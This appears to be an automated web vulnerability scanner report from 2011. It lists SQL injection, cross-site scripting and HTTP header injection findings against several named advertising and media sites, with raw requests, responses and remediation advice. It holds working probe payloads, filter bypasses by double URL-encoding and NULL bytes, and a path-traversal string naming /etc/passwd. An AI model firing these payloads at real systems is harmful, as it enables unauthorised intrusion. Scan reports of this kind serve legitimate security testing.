There is probably no need to perform a second URL-decode of the value of the pb_rtb_ev cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The pxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pxy request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:16:10 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss/wdgabccom,wdgasec was not found on this server. ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:26:47 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 was n ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:27:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 392
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b/ss was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]...
The s parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the s parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b'%20and%201%3d1--%20&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1 Host: www.bradsdeals.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The tid parameter appears to be vulnerable to SQL injection attacks. The payloads 13173906%20or%201%3d1--%20 and 13173906%20or%201%3d2--%20 were each submitted in the tid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=30665613173906%20or%201%3d1--%20&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The utm_campaign parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_campaign parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55'%20and%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The utm_content parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_content parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b'%20and%201%3d1--%20&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The utm_medium parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_medium parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display'%20and%201%3d1--%20&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The utm_source parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_source parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom'%20and%201%3d1--%20&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<title>Brad's Deals of the Day</title> <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />
The v parameter appears to be vulnerable to SQL injection attacks. The payloads 62280894%20or%201%3d1--%20 and 62280894%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The v parameter appears to be vulnerable to SQL injection attacks. The payloads 19496541%20or%201%3d1--%20 and 19496541%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).
Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.
Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the pid request parameter submitted to the URL /bmx3/broker.pli is copied into the HTML document as plain text between tags at the URL /bmx3/broker.pli. The payload 35525%253cscript%253ealert%25281%2529%253c%252fscript%253ef2ebf4b3f03 was submitted in the pid parameter. This input was returned as 35525<script>alert(1)</script>f2ebf4b3f03 in a subsequent request for the URL /bmx3/broker.pli.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the pid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 284b8'-alert(1)-'04109d7f66c was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=28:27:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:49:38 GMT
Date: Sat, 17 Sep 2011 01:49:20 GMT
Content-Length: 2692
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'; ...[SNIP]...
The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 5969c"-alert(1)-"5ef3bafc3c0 was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:19:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=21
Expires: Sat, 17 Sep 2011 01:49:37 GMT
Date: Sat, 17 Sep 2011 01:49:16 GMT
Content-Length: 2692
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994"';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";z="+Math.random();}
The value of the vuid cookie submitted to the URL /chat_init.js is copied into the HTML document as plain text between tags at the URL /chat_init.js. The payload 2e364<script>alert(1)</script>b793934a58c was submitted in the vuid cookie. This input was returned unmodified in a subsequent request for the URL /chat_init.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the cr request parameter is copied into the Location response header. The payload d8d28%0d%0aeb92866aa30 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
The value of the $ request parameter is copied into the Set-Cookie response header. The payload b4e04%0d%0adcb62044598 was submitted in the $ parameter. This caused a response containing an injected HTTP header.
The value of the v request parameter is copied into the Set-Cookie response header. The payload 1bc99%0d%0af3d004c45 was submitted in the v parameter. This caused a response containing an injected HTTP header.
The value of the rurl request parameter is copied into the Location response header. The payload f8960%0d%0a9818607d76e was submitted in the rurl parameter. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload aa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d was submitted in the REST URL parameter 5. This input was echoed as aa5fa*/alert(1)//0f95b5b210d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.jsaa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d?cb=v9.00 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Length: 145111
Content-Type: text/javascript
Last-Modified: Sat, 17 Sep 2011 01:02:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 02:02:31 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=272
Date: Sat, 17 Sep 2011 01:02:32 GMT
Connection: close
The value of the pageURL request parameter is copied into the XML document as plain text between tags. The payload f23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 was submitted in the pageURL parameter. This input was echoed as f23fc<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8491a57dfb1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /service/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angelsf23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Length: 1037
Content-Type: text/xml
Last-Modified: Sat, 17 Sep 2011 01:03:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed04
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 02:03:32 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=279
Date: Sat, 17 Sep 2011 01:03:31 GMT
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f413'-alert(1)-'1042a85aca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.4. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/cm.rev_bostonherald/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9849'-alert(1)-'3c99bede0bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3030f'-alert(1)-'78b5323d0b7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86817'-alert(1)-'7a10fc56168 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:10 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:10 GMT
Content-Length: 482
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3b3a'-alert(1)-'ebe641e9daf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:16 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:16 GMT
Content-Length: 482
4.8. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/iblocal.revinet.bostonherald/audience
Issue detail
